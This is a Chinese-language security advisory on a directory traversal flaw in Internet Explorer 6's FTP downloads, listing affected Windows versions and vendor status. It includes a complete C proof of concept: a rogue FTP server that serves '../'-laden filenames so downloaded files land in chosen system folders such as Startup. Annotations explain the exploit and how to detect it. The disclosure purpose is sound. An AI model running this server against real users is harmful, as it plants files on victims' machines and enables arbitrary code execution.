Microsoft Internet Explorer FTP下载路径目录遍历漏洞

发布日期:2004-12-30
更新日期:2005-01-04

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000
描述:
--------------------------------------------------------------------------------
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer的FTP协议实现不正确,远程攻击者可以利用这个漏洞下载文件到本地任意目标系统目录中。

当通过MSIE从FTP服务器保存文件到本地文件夹时,文件会保存在local_folder/file_name;不过如果文件名包含../,文件的实际保存路径就会改变。攻击者通过架设恶意FTP服务器并设置恶意文件名,诱使用户拖拽文件,或者左键点击后保存,可导致文件被保存到系统的其他目录中,如保存在C:\Documents and settings\All Users\Start menu\Programs\Start可导致任意命令执行。

不过利用双击过程来下载文件不受此漏洞影响。

<*来源:Albert Puigsech Galicia ([email protected]

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110461358930103&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Albert Puigsech Galicia ([email protected])提供了如下测试方法:

/*

  • Internet Explorer FTP download path disclosure fucked prof of concept (7a69Adv#17)
  • ?DOES NOT WORK USING PASV MODE, YOU MUST CODE IT IF YOU WANT !!!

*/

#include

  1<stdio.h>   
  2#include <unistd.h>   
  3#include <fcntl.h>   
  4#include <sys types.h="">   
  5#include <sys stat.h="">   
  6#include <sys socket.h="">   
  7#include <netinet in.h="">   
  8#include <errno.h>   
  9  
 10#define MAX_BUF 1024   
 11#define FTP_PORT 21   
 12  
 13int main(int argc, char **argv) {   
/*
 * PoC from the advisory above: a minimal fake FTP server (active mode only;
 * the header comment says PASV is not implemented, and the PORT branch below
 * is the only place a data connection is set up). It answers the client's
 * LIST with a single entry whose name is "/../../.../..<remote_file>". The
 * advisory's point is that the client saved the download at
 * local_folder/file_name without stripping ".." from the server-supplied name,
 * so the file lands outside the chosen folder.
 *
 * Defensive takeaway: a client must canonicalize server-supplied names and
 * reject path separators and ".." components before joining them to a save
 * directory. On the wire, a ".." sequence inside an FTP LIST response is a
 * cheap IDS/proxy detection signal for this class of attack.
 *
 * argv[1] = local_file, whose bytes are streamed on RETR (fstat/read loop);
 * argv[2] = remote_file, the name placed after the "../" run in LIST.
 */
 14char ch;   
 15char buffer[MAX_BUF + 1];   
 16char ipbuf[MAX_BUF + 1];   
 17char *local_file, *remote_file;   
 18int sfdmain, sfdses, sfddata;   
 19int readed;   
 20int ip1,ip2,ip3,ip4,port1,port2;   
 21int fd;   
 22struct stat st;   
/* Control socket: listens on every interface on port 21 (FTP_PORT). The
 * sockaddr_in is initialized positionally (family, port, address). */
 23struct sockaddr_in ftpmain = { AF_INET, htons(FTP_PORT), INADDR_ANY };   
 24struct sockaddr_in ftpdata;   
 25  
 26if (argc &lt; 3) {   
 27printf("\t7a69Adv#17 - Internet Explorer FTP download path disclosure prof of \   
 28concept\n"); printf("Use:\n");   
 29printf("\t%s <local_file> <remote_file>\n", argv[0]);   
 30exit(0);   
 31}   
 32  
 33local_file = argv[1];   
 34remote_file = argv[2];   
 35  
/* The file to serve is opened once up front and kept open for RETR. */
 36if ((fd = open(local_file, O_RDONLY)) == -1) {   
 37perror("open()");   
 38exit(-1);   
 39}   
 40  
 41if ((sfdmain = socket(AF_INET, SOCK_STREAM, 0)) == -1) {   
 42perror("socket()");   
 43exit(-1);   
 44}   
 45  
 46if (bind(sfdmain, (struct sockaddr *)&amp;ftpmain, sizeof(struct sockaddr)) == -1) {   
 47perror("bind()");   
 48exit(-1);   
 49}   
 50  
 51if (listen(sfdmain, 1) == -1) {   
 52perror("listen()");   
 53exit(-1);   
 54}   
 55  
/* Serves exactly one client session; the listening socket is never re-accepted. */
 56if ((sfdses = accept(sfdmain, NULL, NULL)) == -1) {   
 57perror("accept()");   
 58exit(-1);   
 59}   
 60  
/* Greeting is sent with code 200 rather than the customary 220; left as in the
 * original, the client evidently accepted it. */
 61write(sfdses, "200 OK\r\n", 8);   
 62  
/* Command loop: one read() per command. buffer has MAX_BUF + 1 bytes and the
 * read is capped at MAX_BUF, so the NUL written at buffer[readed] is in bounds.
 * Every reply is canned; command matching is a case-sensitive prefix compare. */
 63while ((readed = read(sfdses, buffer, MAX_BUF)) &gt; 0) {   
 64buffer[readed] = 0;   
 65printf("&gt;&gt; %s", buffer);   
 66if (!strncmp(buffer, "noop", 4)) write(sfdses, "200 OK\r\n", 8);   
 67else if (!strncmp(buffer, "USER ", 5)) write(sfdses, "331 OK\r\n", 8);   
 68else if (!strncmp(buffer, "PASS ", 5)) write(sfdses, "230 OK\r\n", 8);   
 69else if (!strncmp(buffer, "CWD ", 4)) write(sfdses, "250 OK\r\n", 8);   
 70else if (!strncmp(buffer, "PWD", 3)) write(sfdses, "257 \"/\"\r\n", 9);   
 71else if (!strncmp(buffer, "TYPE ", 5)) write(sfdses, "200 OK\r\n", 8);   
/* PORT h1,h2,h3,h4,p1,p2 announces the client's data endpoint; the server then
 * connects out to it (active mode). sscanf's return value is not checked, so a
 * malformed PORT leaves ip1..port2 uninitialized and the snprintf below reads
 * them anyway (undefined behavior). The individual fields are not range-checked
 * either. A failed connect() is reported with 421 on the control channel. */
 72else if (!strncmp(buffer, "PORT ", 5)) {   
 73sscanf(&amp;buffer[5], "%i,%i,%i,%i,%i,%i", &amp;ip1, &amp;ip2, &amp;ip3, &amp;ip4, &amp;port1, &amp;port2);   
 74snprintf(ipbuf, MAX_BUF, "%i.%i.%i.%i", ip1, ip2, ip3, ip4);   
 75ftpdata.sin_family = AF_INET;   
 76ftpdata.sin_addr.s_addr = inet_addr(ipbuf);   
 77ftpdata.sin_port = htons(port1*256+port2);   
 78if ((sfddata = socket(AF_INET, SOCK_STREAM, 0)) == -1) {   
 79perror("socket()");   
 80exit(-1);   
 81}   
 82if (connect(sfddata, (struct sockaddr *)&amp;ftpdata, sizeof(struct sockaddr)) == -1) \   
 83{ write(sfdses, "421 OK\r\n", 8);   
 84} else {   
 85write(sfdses, "220 OK\r\n", 8);   
 86}   
 87}   
/* LIST: the payload line. The single listing entry's name is a run of "/.."
 * components followed by remote_file; a client that appends that name verbatim
 * to its save folder writes outside the folder. This is the string a defender
 * would match on (".." in a LIST response). The data socket is closed right
 * after the listing, so a following RETR depends on the client issuing a new
 * PORT first. */
 88else if (!strncmp(buffer, "LIST", 4)) {   
 89write(sfdses, "150 OK\r\n", 8);   
 90snprintf(buffer, MAX_BUF, "-rwxrwxrwx 1 0 0 1 Dec 08 07:36 \   
 91/../../../../../../../../../../..%s\r\n", remote_file); write(sfddata, buffer, \   
 92strlen(buffer)); close(sfddata);   
 93write(sfdses, "226 OK\r\n", 8);   
 94  
 95}   
/* RETR: streams local_file one byte at a time over the data socket. Neither
 * read() nor write() results are checked, so a short or failed read still
 * sends the stale ch. The st_size decrement only touches the local stat copy.
 * The requested name in the command is ignored; fd always refers to argv[1]. */
 96else if(!strncmp(buffer, "RETR ", 5)) {   
 97write(sfdses, "150 OK\r\n", 8);   
 98fstat(fd, &amp;st);   
 99while(st.st_size-- &gt; 0) {   
100read(fd, &amp;ch, 1);   
101write(sfddata, &amp;ch, 1);   
102}   
103close(sfddata);   
104write(sfdses, "226 OK\r\n", 8);   
105}   
/* QUIT: closes every descriptor. sfddata is closed even when no PORT was ever
 * received, in which case it is still uninitialized. After close(sfdses) the
 * next read() on it fails and the loop terminates. */
106else if (!strncmp(buffer, "QUIT", 4)) {   
107write(sfdses, "221 OK\r\n", 8);   
108close(sfdses); close(sfdmain); close(sfddata);   
109}   
/* Anything unrecognized gets a 500. Note that the match above is the lowercase
 * "noop", so an uppercase NOOP also ends up here. */
110else   
111write(sfdses, "500 WTF\r\n", 9);   
112  
113  
114}   
115}   
116  
建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp